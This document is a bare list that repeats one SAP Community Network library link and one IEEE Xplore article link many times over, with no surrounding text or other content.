http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 